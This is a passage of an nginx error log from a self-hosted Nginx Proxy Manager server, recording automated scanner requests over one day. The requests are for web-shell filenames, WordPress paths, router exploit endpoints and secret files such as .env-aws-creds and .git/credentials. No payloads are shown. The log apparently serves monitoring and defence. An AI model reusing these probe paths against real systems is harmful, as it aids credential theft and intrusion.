"/var/www/html/wp-content/themes/style.php" failed (2: No such file or directory), client: 104.28.246.116, server: localhost-nginx-proxy-manager, request: "GET /wp-content/themes/style.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/13 07:19:08 [error] 250#250: *15735 open() "/var/www/html/wp-admin/style.php" failed (2: No such file or directory), client: 104.28.246.116, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/style.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/13 07:19:08 [error] 250#250: *15735 open() "/var/www/html/wp-includes/style.php" failed (2: No such file or directory), client: 104.28.246.116, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/style.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/13 07:19:08 [error] 250#250: *15735 open() "/var/www/html/chosen.php" failed (2: No such file or directory), client: 104.28.246.116, server: localhost-nginx-proxy-manager, request: "GET /chosen.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/13 07:19:08 [error] 250#250: *15735 open() "/var/www/html/file.php" failed (2: No such file or directory), client: 104.28.246.116, server: localhost-nginx-proxy-manager, request: "GET /file.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/13 07:19:08 [error] 250#250: *15735 open() "/var/www/html/flower.php" failed (2: No such file or directory), client: 104.28.246.116, server: localhost-nginx-proxy-manager, request: "GET /flower.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/13 07:19:08 [error] 250#250: *15735 open() "/var/www/html/gifclass.php" failed (2: No such file or directory), client: 104.28.246.116, server: localhost-nginx-proxy-manager, request: "GET /gifclass.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/13 07:19:09 [error] 250#250: *15735 open() "/var/www/html/bless.php" failed (2: No such file or directory), client: 104.28.246.116, server: localhost-nginx-proxy-manager, request: "GET /bless.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/13 07:19:09 [error] 250#250: *15735 open() "/var/www/html/class-t.api.php" failed (2: No such file or directory), client: 104.28.246.116, server: localhost-nginx-proxy-manager, request: "GET /class-t.api.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/13 07:19:09 [error] 250#250: *15735 open() "/var/www/html/blurbs.php" failed (2: No such file or directory), client: 104.28.246.116, server: localhost-nginx-proxy-manager, request: "GET /blurbs.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/13 07:19:09 [error] 250#250: *15735 open() "/var/www/html/akcc.php" failed (2: No such file or directory), client: 104.28.246.116, server: localhost-nginx-proxy-manager, request: "GET /akcc.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/13 07:19:09 [error] 250#250: *15735 open() "/var/www/html/abcd.php" failed (2: No such file or directory), client: 104.28.246.116, server: localhost-nginx-proxy-manager, request: "GET /abcd.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/13 07:19:09 [error] 250#250: *15735 open() "/var/www/html/shelp.php" failed (2: No such file or directory), client: 104.28.246.116, server: localhost-nginx-proxy-manager, request: "GET /shelp.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/13 07:19:10 [error] 250#250: *15735 open() "/var/www/html/cord.php" failed (2: No such file or directory), client: 104.28.246.116, server: localhost-nginx-proxy-manager, request: "GET /cord.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/13 07:19:10 [error] 250#250: *15735 open() "/var/www/html/dex.php" failed (2: No such file or directory), client: 104.28.246.116, server: localhost-nginx-proxy-manager, request: "GET /dex.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/13 07:19:10 [error] 250#250: *15735 open() "/var/www/html/wp-admin/admin-ajax.php" failed (2: No such file or directory), client: 104.28.246.116, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/admin-ajax.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/13 07:19:10 [error] 250#250: *15735 open() "/var/www/html/file2.php" failed (2: No such file or directory), client: 104.28.246.116, server: localhost-nginx-proxy-manager, request: "GET /file2.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/13 07:19:10 [error] 250#250: *15735 open() "/var/www/html/zwso.php" failed (2: No such file or directory), client: 104.28.246.116, server: localhost-nginx-proxy-manager, request: "GET //zwso.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/13 08:31:37 [error] 250#250: *17451 open() "/var/www/html/sitemap.xml" failed (2: No such file or directory), client: 162.142.125.117, server: localhost-nginx-proxy-manager, request: "GET /sitemap.xml HTTP/1.1", host: "92.249.249.197" +2026/01/13 08:35:14 [error] 250#250: *17455 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 185.241.208.170, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "92.249.249.197" +2026/01/13 08:55:08 [error] 247#247: *17463 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 193.142.147.209, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 09:45:34 [error] 247#247: *17475 "/var/www/html/bin/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /bin/ HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 09:46:36 [error] 247#247: *17476 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 10:27:38 [error] 248#248: *17486 "/var/www/html/backup/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /backup/ HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 10:57:52 [error] 256#256: *17492 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 11:41:24 [error] 254#254: *17776 open() "/var/www/html/_next" failed (2: No such file or directory), client: 95.214.55.246, server: localhost-nginx-proxy-manager, request: "POST /_next HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 11:41:24 [error] 254#254: *17777 open() "/var/www/html/api" failed (2: No such file or directory), client: 95.214.55.246, server: localhost-nginx-proxy-manager, request: "POST /api HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 11:41:24 [error] 254#254: *17778 open() "/var/www/html/_next/server" failed (2: No such file or directory), client: 95.214.55.246, server: localhost-nginx-proxy-manager, request: "POST /_next/server HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 11:41:25 [error] 254#254: *17779 open() "/var/www/html/app" failed (2: No such file or directory), client: 95.214.55.246, server: localhost-nginx-proxy-manager, request: "POST /app HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 11:41:25 [error] 254#254: *17780 open() "/var/www/html/api/route" failed (2: No such file or directory), client: 95.214.55.246, server: localhost-nginx-proxy-manager, request: "POST /api/route HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 11:41:25 [error] 254#254: *17782 open() "/var/www/html/_next" failed (2: No such file or directory), client: 95.214.55.246, server: localhost-nginx-proxy-manager, request: "POST /_next HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 11:41:25 [error] 255#255: *17783 open() "/var/www/html/api" failed (2: No such file or directory), client: 95.214.55.246, server: localhost-nginx-proxy-manager, request: "POST /api HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 11:41:25 [error] 255#255: *17784 open() "/var/www/html/_next/server" failed (2: No such file or directory), client: 95.214.55.246, server: localhost-nginx-proxy-manager, request: "POST /_next/server HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 11:41:26 [error] 255#255: *17785 open() "/var/www/html/app" failed (2: No such file or directory), client: 95.214.55.246, server: localhost-nginx-proxy-manager, request: "POST /app HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 11:41:27 [error] 255#255: *17786 open() "/var/www/html/api/route" failed (2: No such file or directory), client: 95.214.55.246, server: localhost-nginx-proxy-manager, request: "POST /api/route HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 12:16:11 [error] 255#255: *17794 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 12:54:22 [error] 256#256: *17805 open() "/var/www/html/form.html" failed (2: No such file or directory), client: 159.203.70.73, server: localhost-nginx-proxy-manager, request: "GET /form.html HTTP/1.1", host: "92.249.249.197" +2026/01/13 12:54:23 [error] 256#256: *17806 open() "/var/www/html/upl.php" failed (2: No such file or directory), client: 159.203.70.73, server: localhost-nginx-proxy-manager, request: "GET /upl.php HTTP/1.1", host: "92.249.249.197" +2026/01/13 12:54:23 [error] 256#256: *17807 open() "/var/www/html/t4" failed (2: No such file or directory), client: 159.203.70.73, server: localhost-nginx-proxy-manager, request: "GET /t4 HTTP/1.1", host: "92.249.249.197" +2026/01/13 12:54:23 [error] 256#256: *17808 "/var/www/html/geoip/index.html" is not found (2: No such file or directory), client: 159.203.70.73, server: localhost-nginx-proxy-manager, request: "GET /geoip/ HTTP/1.1", host: "92.249.249.197" +2026/01/13 12:54:24 [error] 254#254: *19296 open() "/var/www/html/1.php" failed (2: No such file or directory), client: 159.203.70.73, server: localhost-nginx-proxy-manager, request: "GET /1.php HTTP/1.1", host: "92.249.249.197" +2026/01/13 12:54:24 [error] 254#254: *19297 open() "/var/www/html/systembc/password.php" failed (2: No such file or directory), client: 159.203.70.73, server: localhost-nginx-proxy-manager, request: "GET /systembc/password.php HTTP/1.1", host: "92.249.249.197" +2026/01/13 12:54:24 [error] 254#254: *19298 open() "/var/www/html/password.php" failed (2: No such file or directory), client: 159.203.70.73, server: localhost-nginx-proxy-manager, request: "GET /password.php HTTP/1.1", host: "92.249.249.197" +2026/01/13 13:29:55 [error] 255#255: *19304 "/var/www/html/webui/index.html" is not found (2: No such file or directory), client: 65.49.1.192, server: localhost-nginx-proxy-manager, request: "GET /webui/ HTTP/1.1", host: "92.249.249.197" +2026/01/13 13:31:13 [error] 255#255: *19305 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 13:32:12 [error] 257#257: *20795 "/var/www/html/geoserver/web/index.html" is not found (2: No such file or directory), client: 65.49.1.192, server: localhost-nginx-proxy-manager, request: "GET /geoserver/web/ HTTP/1.1", host: "92.249.249.197" +2026/01/13 14:50:37 [error] 254#254: *20832 open() "/var/www/html/admin/config.php" failed (2: No such file or directory), client: 102.22.20.125, server: localhost-nginx-proxy-manager, request: "GET /admin/config.php HTTP/1.0", host: "92.249.249.197" +2026/01/13 14:52:29 [error] 254#254: *20841 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 14:54:36 [error] 255#255: *20846 open() "/var/www/html/_next" failed (2: No such file or directory), client: 87.121.84.24, server: localhost-nginx-proxy-manager, request: "POST /_next HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 14:54:36 [error] 255#255: *20847 open() "/var/www/html/_next" failed (2: No such file or directory), client: 87.121.84.24, server: localhost-nginx-proxy-manager, request: "POST /_next HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 14:54:43 [error] 255#255: *20848 open() "/var/www/html/api" failed (2: No such file or directory), client: 87.121.84.24, server: localhost-nginx-proxy-manager, request: "POST /api HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 14:54:43 [error] 255#255: *20849 open() "/var/www/html/api" failed (2: No such file or directory), client: 87.121.84.24, server: localhost-nginx-proxy-manager, request: "POST /api HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 14:54:49 [error] 255#255: *20850 open() "/var/www/html/_next/server" failed (2: No such file or directory), client: 87.121.84.24, server: localhost-nginx-proxy-manager, request: "POST /_next/server HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 14:54:50 [error] 255#255: *20851 open() "/var/www/html/_next/server" failed (2: No such file or directory), client: 87.121.84.24, server: localhost-nginx-proxy-manager, request: "POST /_next/server HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 14:54:56 [error] 255#255: *20852 open() "/var/www/html/app" failed (2: No such file or directory), client: 87.121.84.24, server: localhost-nginx-proxy-manager, request: "POST /app HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 14:54:56 [error] 255#255: *20853 open() "/var/www/html/app" failed (2: No such file or directory), client: 87.121.84.24, server: localhost-nginx-proxy-manager, request: "POST /app HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 14:55:01 [error] 255#255: *20854 open() "/var/www/html/api/route" failed (2: No such file or directory), client: 87.121.84.24, server: localhost-nginx-proxy-manager, request: "POST /api/route HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 14:55:01 [error] 255#255: *20855 open() "/var/www/html/api/route" failed (2: No such file or directory), client: 87.121.84.24, server: localhost-nginx-proxy-manager, request: "POST /api/route HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 14:58:34 [error] 255#255: *20856 open() "/var/www/html/actuator/gateway/routes" failed (2: No such file or directory), client: 79.124.40.174, server: localhost-nginx-proxy-manager, request: "GET /actuator/gateway/routes HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 15:50:55 [error] 256#256: *20871 open() "/var/www/html/.git/credentials" failed (2: No such file or directory), client: 195.178.110.246, server: localhost-nginx-proxy-manager, request: "GET /.git/credentials HTTP/1.1", host: "92.249.249.197" +2026/01/13 16:21:59 [error] 255#255: *22375 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 17:19:17 [error] 263#263: *22398 open() "/var/www/html/.git/index" failed (2: No such file or directory), client: 185.241.208.170, server: localhost-nginx-proxy-manager, request: "GET /.git/index HTTP/1.1", host: "92.249.249.197" +2026/01/13 17:40:48 [error] 261#261: *22401 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 18:10:09 [error] 261#261: *22405 open() "/var/www/html/.env" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 18:10:09 [error] 261#261: *22406 open() "/var/www/html/.env-react.log" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env-react.log HTTP/1.1", host: "92.249.249.197" +2026/01/13 18:10:09 [error] 261#261: *22407 open() "/var/www/html/.env.mail_keys" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env.mail_keys HTTP/1.1", host: "92.249.249.197" +2026/01/13 18:10:09 [error] 261#261: *22408 open() "/var/www/html/.env-allowlist" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env-allowlist HTTP/1.1", host: "92.249.249.197" +2026/01/13 18:10:10 [error] 261#261: *22409 open() "/var/www/html/.env-sequelize" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env-sequelize HTTP/1.1", host: "92.249.249.197" +2026/01/13 18:10:10 [error] 261#261: *22410 open() "/var/www/html/.env-constants" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env-constants HTTP/1.1", host: "92.249.249.197" +2026/01/13 18:10:10 [error] 261#261: *22411 open() "/var/www/html/.env-aws-creds" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env-aws-creds HTTP/1.1", host: "92.249.249.197" +2026/01/13 18:10:10 [error] 261#261: *22412 open() "/var/www/html/.env-proxy.log" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env-proxy.log HTTP/1.1", host: "92.249.249.197" +2026/01/13 18:10:10 [error] 261#261: *22413 open() "/var/www/html/.env-tasks.yml" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env-tasks.yml HTTP/1.1", host: "92.249.249.197" +2026/01/13 18:10:10 [error] 261#261: *22414 open() "/var/www/html/.env.token.bak" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env.token.bak HTTP/1.1", host: "92.249.249.197" +2026/01/13 18:10:11 [error] 261#261: *22415 open() "/var/www/html/.env-workspace" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env-workspace HTTP/1.1", host: "92.249.249.197" +2026/01/13 18:10:11 [error] 261#261: *22416 open() "/var/www/html/.env.mail.json" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env.mail.json HTTP/1.1", host: "92.249.249.197" +2026/01/13 18:10:11 [error] 262#262: *22417 open() "/var/www/html/.env-prod.conf" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env-prod.conf HTTP/1.1", host: "92.249.249.197" +2026/01/13 18:10:11 [error] 262#262: *22418 open() "/var/www/html/.env-test-data" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env-test-data HTTP/1.1", host: "92.249.249.197" +2026/01/13 18:10:11 [error] 262#262: *22419 open() "/var/www/html/.env.example.1" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env.example.1 HTTP/1.1", host: "92.249.249.197" +2026/01/13 18:10:12 [error] 262#262: *22420 open() "/var/www/html/.env.example.2" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env.example.2 HTTP/1.1", host: "92.249.249.197" +2026/01/13 18:10:12 [error] 262#262: *22421 open() "/var/www/html/.env-rules.log" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env-rules.log HTTP/1.1", host: "92.249.249.197" +2026/01/13 19:10:35 [error] 261#261: *23933 open() "/var/www/html/goform/formJsonAjaxReq" failed (2: No such file or directory), client: 91.224.92.14, server: localhost-nginx-proxy-manager, request: "POST /goform/formJsonAjaxReq HTTP/1.1", host: "92.249.249.197:80", referrer: "http://92.249.249.197:80/home.asp" +2026/01/13 19:16:05 [error] 261#261: *23934 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 19:29:57 [error] 261#261: *23942 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 86.54.31.40, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "92.249.249.197" +2026/01/13 19:29:58 [error] 261#261: *23943 open() "/var/www/html/sitemap.xml" failed (2: No such file or directory), client: 86.54.31.40, server: localhost-nginx-proxy-manager, request: "GET /sitemap.xml HTTP/1.1", host: "92.249.249.197" +2026/01/13 19:29:58 [error] 262#262: *23944 open() "/var/www/html/.well-known/security.txt" failed (2: No such file or directory), client: 86.54.31.40, server: localhost-nginx-proxy-manager, request: "GET /.well-known/security.txt HTTP/1.1", host: "92.249.249.197" +2026/01/13 19:35:20 [error] 263#263: *25435 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 44.234.56.174, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/13 20:19:44 [error] 261#261: *25450 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 195.178.110.162, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "92.249.249.197" +2026/01/13 20:30:28 [error] 261#261: *25451 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 20:45:06 [error] 261#261: *25456 open() "/var/www/html/.env" failed (2: No such file or directory), client: 147.182.151.27, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 20:45:07 [error] 261#261: *25457 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 147.182.151.27, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "92.249.249.197" +2026/01/13 21:52:34 [error] 262#262: *25604 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 22:40:19 [error] 261#261: *27120 open() "/var/www/html/login" failed (2: No such file or directory), client: 206.168.34.51, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "92.249.249.197" +2026/01/13 22:54:35 [error] 271#271: *27122 open() "/var/www/html/goform/formJsonAjaxReq" failed (2: No such file or directory), client: 91.224.92.14, server: localhost-nginx-proxy-manager, request: "POST /goform/formJsonAjaxReq HTTP/1.1", host: "92.249.249.197:80", referrer: "http://92.249.249.197:80/home.asp" +2026/01/13 22:59:20 [error] 272#272: *27124 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 23:33:32 [error] 270#270: *27145 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 193.142.147.209, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 23:57:59 [error] 270#270: *27151 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 23:59:50 [error] 270#270: *27154 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 204.76.203.6, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 00:10:02 [error] 270#270: *27156 open() "/var/www/html/admin/config.php" failed (2: No such file or directory), client: 91.232.238.112, server: localhost-nginx-proxy-manager, request: "GET /admin/config.php HTTP/1.0", host: "92.249.249.197" +2026/01/14 00:35:55 [error] 272#272: *30147 open() "/var/www/html/.well-known/security.txt" failed (2: No such file or directory), client: 167.94.146.61, server: localhost-nginx-proxy-manager, request: "GET /.well-known/security.txt HTTP/1.1", host: "92.249.249.197" +2026/01/14 01:02:01 [error] 272#272: *30152 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 01:08:57 [error] 272#272: *30154 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 16.147.255.82, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/14 02:06:33 [error] 271#271: *31662 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 77.83.39.162, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "92.249.249.197" +2026/01/14 02:12:30 [error] 272#272: *31669 open() "/var/www/html/.git/HEAD" failed (2: No such file or directory), client: 185.241.208.170, server: localhost-nginx-proxy-manager, request: "GET /.git/HEAD HTTP/1.1", host: "92.249.249.197" +2026/01/14 02:20:59 [error] 272#272: *31674 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 204.76.203.6, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 02:47:34 [error] 272#272: *31680 "/var/www/html/bins/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /bins/ HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 02:48:50 [error] 272#272: *31681 open() "/var/www/html/developmentserver/metadatauploader" failed (2: No such file or directory), client: 20.221.56.179, server: localhost-nginx-proxy-manager, request: "GET /developmentserver/metadatauploader HTTP/1.1", host: "92.249.249.197" +2026/01/14 04:26:20 [error] 272#272: *33203 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 165.154.206.139, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "92.249.249.197" +2026/01/14 04:26:20 [error] 272#272: *33204 open() "/var/www/html/sitemap.xml" failed (2: No such file or directory), client: 165.154.206.139, server: localhost-nginx-proxy-manager, request: "GET /sitemap.xml HTTP/1.1", host: "92.249.249.197" +2026/01/14 04:44:46 [error] 278#278: *33210 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 93.123.72.132, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "92.249.249.197:80" +2026/01/14 04:49:40 [error] 279#279: *33211 open() "/var/www/html/style.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /style.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:40 [error] 279#279: *33211 open() "/var/www/html/wp-content/style.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /wp-content/style.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:41 [error] 279#279: *33211 open() "/var/www/html/wp-content/themes/style.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /wp-content/themes/style.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:41 [error] 279#279: *33211 open() "/var/www/html/wp-admin/style.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/style.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:41 [error] 279#279: *33211 open() "/var/www/html/wp-includes/style.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/style.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:41 [error] 279#279: *33211 open() "/var/www/html/chosen.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /chosen.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:41 [error] 279#279: *33211 open() "/var/www/html/file.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /file.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:41 [error] 279#279: *33211 open() "/var/www/html/flower.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /flower.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:41 [error] 279#279: *33211 open() "/var/www/html/gifclass.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /gifclass.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:41 [error] 279#279: *33211 open() "/var/www/html/bless.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /bless.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:42 [error] 279#279: *33211 open() "/var/www/html/class-t.api.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /class-t.api.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:42 [error] 279#279: *33211 open() "/var/www/html/blurbs.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /blurbs.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:42 [error] 279#279: *33211 open() "/var/www/html/akcc.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /akcc.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:42 [error] 279#279: *33211 open() "/var/www/html/abcd.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /abcd.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:42 [error] 279#279: *33211 open() "/var/www/html/shelp.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /shelp.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:42 [error] 279#279: *33211 open() "/var/www/html/cord.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: "GET /cord.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/14 04:49:42 [error] 279#279: *33211 open() "/var/www/html/dex.php" failed (2: No such file or directory), client: 104.28.214.112, server: localhost-nginx-proxy-manager, request: 